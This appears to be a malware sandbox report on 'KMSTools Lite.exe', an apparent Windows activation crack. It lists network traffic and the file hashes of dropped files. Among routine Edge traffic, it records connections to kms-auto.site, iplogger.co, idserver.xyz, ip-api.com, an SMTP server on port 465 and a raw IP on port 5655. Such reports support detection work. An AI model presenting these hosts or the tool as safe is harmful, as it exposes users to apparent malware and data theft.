US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
GB 104.86.110.120:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 172.67.212.241:443 kms-auto.site udp
GB 104.86.110.120:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.66.171:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 13.87.96.169:443 checkappexec.microsoft.com tcp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
GB 2.18.66.57:443 copilot.microsoft.com tcp
US 8.8.8.8:53 studiostaticassetsprod.azureedge.net udp
US 8.8.8.8:53 studiostaticassetsprod.azureedge.net udp
US 13.107.246.64:443 studiostaticassetsprod.azureedge.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 104.86.110.97:443 www.bing.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
GB 2.18.66.169:443 www.bing.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
GB 104.86.110.96:443 www.bing.com tcp
FR 52.222.169.76:443 sb.scorecardresearch.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 2.18.190.182:443 assets.msn.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
GB 104.86.110.96:443 www.bing.com tcp
GB 104.86.110.96:443 www.bing.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 idserver.xyz udp
US 104.21.48.1:80 idserver.xyz tcp
US 8.8.8.8:53 iplogger.co udp
US 172.67.167.249:443 iplogger.co tcp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
NL 173.194.69.94:80 o.pki.goog tcp
CZ 91.184.249.83:5655 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
IT 91.80.49.21:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp

Files

\??\pipe\crashpad_1188_MFJLFUJCFASNXRBA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 845d842365a2b1d6fc543d5987a8444c
SHA1 d9e74493c371fda8850da9a0daa8bc4f77ec0326
SHA256 6f55c946ac04a6258c714365d9a2cd4ac841e695f3be9f04e84310e5d9ab6110
SHA512 3fa48469bc4e7d480b7ad5c98a8a3e4e3f210ad986b6aa4e6d8b3a2a0061b2ad7423ac673fb45a435bbdd927f623e3032039b8fbf0aaf5a9ecd98831378562d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 38d6d1d1e45be19825fc28191b82953c
SHA1 527778930202971fddd2f32a60b25756c2d26c68
SHA256 40f0260693f82c5c8425ede2cc137ee3d45eb0c0f0916b67d73b05a5029a49ac
SHA512 ab8588a7ef927c914af3b5c63893e409e3f7de4606ab7f22806198e86085d96a480125cf8153d91a37d4a3fdc088b3256b0282ba664f8eac025d3b9b567c730b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 30e377505ec4f100cf4426003a277efe
SHA1 5ed7705afda986f6b83977ca7d2c236b05d8764c
SHA256 3c970ea95256e66c9fddab517a2095c23a528906c30a2f1ff51b7af55081a956
SHA512 3fac9fbf41fc5618fdcced6b71c7642afe0d8ff57a462097f76835da68e050a0f97dc9ef043d1bdc4955a6a59e025b85d4f91fd0d9af875ce6c9a68db67bac83

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0058a8ff9cf739f9993f2c398758feff
SHA1 fde4e2a03333da9860f4d5ac57ff8e93335b258a
SHA256 1e4e785eec1b08d590ddaeedaf8c4da361ffabc1eb0bb256f9dbcca08926b6b7
SHA512 eb7003a463b0eac5b853df21e9ca71699387633ac34c7fae4525bed9afc9c317f492be4378e4a0656cb6b0a2e5568e590d7d32b2a036b554d8143b77212d6a1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 0755cb96c061ec84ef950959d37a9149
SHA1 136b62b2dd9ef0a02c3a847128a3b960e38c6ce3
SHA256 ca79ca5814eacbb0470d01ae3d583487be8bf1ca2563a219bd48f63bc7e13104
SHA512 8014c7b2323e3a66c54a77befbb1e4f30e8d1aa9ffee3739af6a053533eda5d5ad1ffcef2767a9958813508c1edb85633d18179a4acc886dab23e969c0982b08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 2b66d93c82a06797cdfd9df96a09e74a
SHA1 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256 d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA512 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3367d719ea1f750b9030144de5f41e49
SHA1 adf3197401953d4bf4db9a471428812b96478458
SHA256 d29c0f65005e4cce382796cd1506465a517d11558606844f2da0cc14d8a8671e
SHA512 8356fea9806736e3231dc8728d758ff50c297301ef634f1b7f310d7e5e5ad3dce44603d947da3eed0f5ffaf9eb58ca2300e809c4813e2609bb8a2e8e5bc823c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f61ff8a76b902d38a7f0b0b913df0809
SHA1 3cd1d1acdf341bca7108188294fbf122df6b1f0a
SHA256 5ea52ac89c0d5e53f851389db64c2fea3db91ea0a8b8b8a4799e851446567a3e
SHA512 295cda06641fbaaf0a607cf1b4a420cc0a1778d9a072b75dfd800969a84341cb2a60098c093d373e5e5da45c3ba20db9d2bbecacebdedb46cf5bc66a6ec67467

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 291c5883fa312e5add47f78d2d4d06d6
SHA1 f8b3f68bc58282007462ec874af28c702a147fe7
SHA256 6f5a78bcca18b244c3db221aa97fe823d01236373d38ce60f47de1197592510e
SHA512 1be924a839c6bfd469ea7da8a1abc860c2394672da8becdbcf419bd928547842cab73116bdd5fc4d5d8e6c0fdfedcd9f2b61d874046c1e7823bfc464e5f970f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 92be2585d4e607ebcad11ab954198acf
SHA1 17a3c5570de98a22f956bb59f2e51d8141681f52
SHA256 0c6e08ac5572212150d8d90fc3d9260df9c448cc41c9f290cd0662925a1eee33
SHA512 c47fd34290f11fa4734d34c0eed46c9cfae579ef6ad711f8317a4733aadf71134653119f254d073d639b7f0fe6fedeb1e31029ffe6eaddae9df2fbb8bfdb1d31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57a4fa.TMP

MD5 f59dce7143f42cfa8734cac4acee8397
SHA1 f1df959104321916633ab92992d5adfdaf8564b9
SHA256 70b33699e0b01d82eeebbe1dddbdd4f0a34d55e1ef05329144b0f5b1ba1a9263
SHA512 9a9aefc98ee82862a5cd103acaeea4b05c58faa21755c2824b1f8782f5430546f35b1defa39e07edaec63daac7bd1507cefb1b07c62c4895c752d38712e8ecfc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6de2d1d4a0ca2a9d2b79aad17e94ab87
SHA1 b05cc14a8c73c6ca04c10bcabf5ae8e39ebddae8
SHA256 9c04a0ade86b9962bb95826086cdb7a67c5ff61a856bf9593168f893619a8587
SHA512 4f5ffde174fb092ad519d352928f3315496f09b422e293eefbf1b1da2b42aec7c7b2c2e0afd31e235aba0c301596219926b1993bbf1ef78f0edfa4ca7447ad61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 7447417dbafbe1dd05d99e847ae51258
SHA1 b290b29b5afa9993956a1abe736669d28ba42257
SHA256 23069a5c811489e9b3a61e3cb605008fdd1c26e2e9eb261d997bd337805bd710
SHA512 7c2cf2fa0bf1417f19c0ca8abcf3e9f0f62eda4793d1d059e34f4d900b95da82e7c0dafc0334d4c1073a66cf55640ddf01195616be881fff9769ca5b881bc273

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 c421ffcc5977177154f534ba8a5029ae
SHA1 3fdfd5a19d55e39259feae14606fffab4c76efee
SHA256 71e6c0cd425df7ff29c8d1e142ab121a168bfaf85499d037cc4069fa7133515c
SHA512 b50c49280c40b59dbac2b1512f10b745b4df5b32492a9d2202f90a221e433bc78fa0a2894e495e01108d048ea0252570d9f3f0f9793b30daa27d1e2e5404aa5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 3f8927c365639daa9b2c270898e3cf9d
SHA1 c8da31c97c56671c910d28010f754319f1d90fa6
SHA256 fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2
SHA512 d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 af5a8ccdf4b83383454d0633ac12101f
SHA1 1ed4c7962e272c576e0eb1303a192b9b411a71f9
SHA256 582e48a3e0971bc2dc2e4fd4dcb2629c8be0865d8eae99a59968fa7c4db24671
SHA512 cf5f4cd48d17211469742ede3e92122aab8fcfeb924a0bbdf894e3a8c0f69f585c6b0d3a86f5e8e60a0e9ad9b393b8ea03b31a24a2160ead93f9e421324bed79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 223e95a10c0d7f3ae1342198068775ac
SHA1 e3bbf7cfe52627e0f2a8b4508abe437c88077f27
SHA256 3c8d7b1c83ad8ed47e48b717c3d409cfa58ff00acb4c27e638d89068c425c83b
SHA512 623c75bc77e624220392f6df179e46e346e91e28eb8d7130194b6f015520a1246a74955a2062d3a1d12740693ae12469cb8ce8fc5e8129bbd20a49fe19849753

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 9a458cb4e791939f78f40dbd52fba323
SHA1 e41404e1e7467f75d57b8cc6562790da6198df14
SHA256 5fba5184f68d2a5d84774067a06eae61ed8e5d6c122477d16e49e8aabe6f54b7
SHA512 5ebe2ee700c76b19663317a0a0ca6b09b4fc2073027f4cf28b49ce6523f56d61d7465797c569c7aad60404f51a045ea4021eefbe8ed2baeb586f252f43ca4cf5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1c79390706807a17ff6a350efb6c9978
SHA1 2dc9968898df93b74be807dae7a7a9e216c569cc
SHA256 32cfa5f6873d6e2df79c4eee1796b04cd3be9aa2dd91230598cd1063ba20b343
SHA512 9ab33cc5402c07127489ebfb3463207bcfec76f476c942babb50e5c6c9b6ec869d52b0f13328491485d1272be1b61ee14ac1a270e9e5f271202c6490dca34ab2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 a66a4535f50c39d7832e48ca61756c12
SHA1 beb5c30e6b5c78407a11a8a4fd5f8e3ebdc36691
SHA256 4e5ef2a514f82037bdf00b9f1a889097f9925daa9576c9ee2cc64948c7bdec9f
SHA512 00cb41dcbf5af7041372da8512088cb2877c67103100aa01a84af31395fe79e222a16718ec88e8bee50c566555483501b13636cc1f047e563aa60b198e9de9bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 26c0c227375f191ce814124955dd64de
SHA1 05dca8f12b860f6806a2eef865492b548c1033d9
SHA256 63e5398fecf5a8ef84840685d6ba326e748bd46b11b158b5b935d57d38bfc28d
SHA512 f470e959e72bc89ce95fca5e92305043c6d3e183b858cbdfa36728bd5c9e0d9923cc82cae2d7fffb37368fa7625625664d840fdfc36c10f6b200d6ff282a8e54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 9eac58694a7bc02a0b3f963721d6073f
SHA1 2c915fb2b3fdb079317441ed5d8d19c3ea9a5885
SHA256 2f1e00c4befe64bbc856b966c6e6bb62ad59161d19dbd76ef005060edcd26f51
SHA512 5cf86f9c08a4df1e46509f762c7a8bc590d813de77c98c1b50765120137941f95ebf7cdff45d7ba7fb4a37b778c014f220b441827f01a76ff2ea273080d14232

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

MD5 586acef7f88a08bae8ff3d97a38ab316
SHA1 427c7aa31e2d94ea9bfdfa7ae7556d7a6bbf8069
SHA256 9bc8ad7a6eb7e126bbba452910f464c6e1dfd0a112625505bdf45ad467d4cb19
SHA512 0c1991a5c354af153707b8ee26de76dfe3172d2be94ee5a8b1e3bebfed1d3f6ea02f02dcdd657b99f89884da925375022edc6fd977fdab0339f616cab29f9f00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll

MD5 f5f5b37fd514776f455864502c852773
SHA1 8d5ed434173fd77feb33cb6cb0fad5e2388d97c6
SHA256 2778063e5ded354d852004e80492edb3a0f731b838bb27ba3a233bc937592f6e
SHA512 b0931f1cae171190e6ec8880f4d560cc7b3d5bffe1db11525bd133eaf51e2e0b3c920ea194d6c7577f95e7b4b4380f7845c82eb2898ad1f5c35d4550f93a14b6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 12ccb1df0fd004ac7a4019ba18534987
SHA1 3e4070a1db515851747d9e4217e913b7da5efb72
SHA256 ddddc682560170bd7265fb34fd3dfb468323bbc6c94f23ad3a24936fe3b87230
SHA512 1a2b064f0dbefe4d9d274fc81edb28f178303b2c992acf6f142f360be854dab1674f0ee5005c73872e5fb14c88b35d9585c967b4a7c664590f26402bb79381c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 bb47cb8281cf4b188758865014cbcd4e
SHA1 923fe63a6abe3094356b102b16cfa2d2d149f274
SHA256 d4d3699d9b2aa772d33ccd5bf50323e345a042553108d0b25730d2db7b378e9e
SHA512 464360ecac7e52ffe03a4ed9d5fc3b9748258f03d5a266337ec3745c319f2cb95c072125f67c608bd39046e05a5d1e5f75ed375a0d0d4a186b4510331e9c0ae2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index

MD5 0b35ead3858b4c9a6b2f8c7eb0e71adf
SHA1 1db30b60e1d389b09908b5a22c79d3dc25177741
SHA256 b99478a1a54b9c1eb89673a00bd70d2c5507745ad7138d2d99fb4052e805a666
SHA512 b45a486db1c5162180f2c29b0c67efd9a02786c2dca3d0bff70853ad23eea278a1025549b8d48b77730a5353e096224a40843180d5934285164f2558608fbe08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0276f200-a60f-41f1-959f-ecfcfa87a7e1\index-dir\the-real-index~RFe5be51d.TMP

MD5 21d63a08aa4713ba0f73614e9e827925
SHA1 a1399ac8d9597e4c39e58c527b13448797b80333
SHA256 667b375618c85cb974781303edbdd4121d3cea9dc97426fbff1ff7ecea6d61ed
SHA512 7e29c6496ad6c9c3716d9460be6ce1bbfa6e6eddad59cd8cd4d27c60f1ed54a3ac535d22fcc92ce221e74893237eadbdd3180a003c0302083b03eb79c8ae840c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 679a37cd22de1db1d6ed91f3bb5a0cae
SHA1 031766b8ca7567f69830c4a5590c4906b7434385
SHA256 dfc7fda803eae59008a57bd5e73fbc7b045185dda3319654c2d065594c36e907
SHA512 cc2338a6acbf9612e0928d83b9a1b520828e63bce4f56f0232fd90946dc0db823de90808222c9e1ab2855fe5dca2fd022f6cf5c3bc281207ea007d34165aeca9

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bn.hyb

MD5 8961fdd3db036dd43002659a4e4a7365
SHA1 7b2fa321d50d5417e6c8d48145e86d15b7ff8321
SHA256 c2784e33158a807135850f7125a7eaabe472b3cfc7afb82c74f02da69ea250fe
SHA512 531ecec11d296a1ab3faeb2c7ac619da9d80c1054a2ccee8a5a0cd996346fea2a2fee159ac5a8d79b46a764a2aa8e542d6a79d86b3d7dda461e41b19c9bebe92

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mr.hyb

MD5 0807cf29fc4c5d7d87c1689eb2e0baaa
SHA1 d0914fb069469d47a36d339ca70164253fccf022
SHA256 f4df224d459fd111698dd5a13613c5bbf0ed11f04278d60230d028010eac0c42
SHA512 5324fd47c94f5804bfa1aa6df952949915896a3fc77dccaed0eeffeafe995ce087faef035aecea6b4c864a16ad32de00055f55260af974f2c41afff14dce00f3

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-nn.hyb

MD5 f2d8fe158d5361fc1d4b794a7255835a
SHA1 6c8744fa70651f629ed887cb76b6bc1bed304af9
SHA256 5bcbb58eaf65f13f6d039244d942f37c127344e3a0a2e6c32d08236945132809
SHA512 946f4e41be624458b5e842a6241d43cd40369b2e0abc2cacf67d892b5f3d8a863a0e37e8120e11375b0bacb4651eedb8d324271d9a0c37527d4d54dd4905afab

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 eba0cdd0032bfad4156bb6bd5ed94087
SHA1 feaa857d709b2340729c867005447536d7b6aa0a
SHA256 c9beb42963210d0db0f2fd8c2b2f85992e257cb742cc43c9299d83f068e089d2
SHA512 bb7895abd8340941b3a0efa7a223df9003656a54b74af1ab1d45f76f076c5a62d1eea4a257d315e15d92fc826060432f13bdb82e8e0837723da08c37d3cf7fa7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 62c572652c75c8e2582e3856b1fcc7d8
SHA1 e2f63e1c2529d714adfc9a4da1dcd08cf48ad19b
SHA256 79546363f63afc7d6007fd0bd7379b6aaf13c83cf6f93a7c76799f87cb74c0f4
SHA512 9eca7aafdc52377dcffc7ad604b5d56c6e0df350b614df0743f2261082a0a3a6c926e20c94d01c3f6009996ec039529b80c8b77a50dc7cbe93e214b77c6022e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 5be28b1248e4d9e63e0a80329c76aef1
SHA1 8282af6c2a597f6fcd528caa89742bc1b21d5863
SHA256 8e560e35e18850b716747b1bbc5ba32cfc1c28c718e906e220600575de34d4bc
SHA512 350f74310f697052e1a7b75de2b2d3a5a9c2fac4043921940c4af6b9225ff7be266168312893b3a58cd5e13bcc04b056d65cadc294a3346b29a7f55a03448d29

memory/2560-891-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-892-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-894-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-893-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-895-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-896-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-897-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-898-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

memory/2560-900-0x00007FF641090000-0x00007FF641D3A000-memory.dmp

C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js

MD5 1db0c159a8afc8073ed9f0a83f782ae8
SHA1 0874d03928cc347db7f5c7720fa6c23321671fb7
SHA256 f7ee28dee8d78ac7456a683cbc673e8b3b57bc9a1ba37c0d6d5d4332a7534d93
SHA512 4fda31e15918efa31ebbd69965e3fa1702daf6b1995af2c010a63e55030ee2f3affb4c45ea6275b7d4c35c0e61bdfbd3051872f392725394489b4c43e8cb3bf1

memory/2936-964-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-965-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-967-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-968-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-966-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-970-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-969-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-971-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

memory/2936-973-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe

MD5 db9c455f121b95bf2326ca1939dad9cf
SHA1 6ea25badededb817ba6b18c830906cdbbaf04837
SHA256 b8a7519e33c7e20dc3fe2383c7610e1610b9ffba438d2555c1f8b2114c094770
SHA512 61200ea650659ed6e96431660056768f3024e012d5ed86e983ee04e424b550b4dc0bdbbb5e95c8d76d0202e1613842547b8149b650ca95b6a7e562a721568fb1

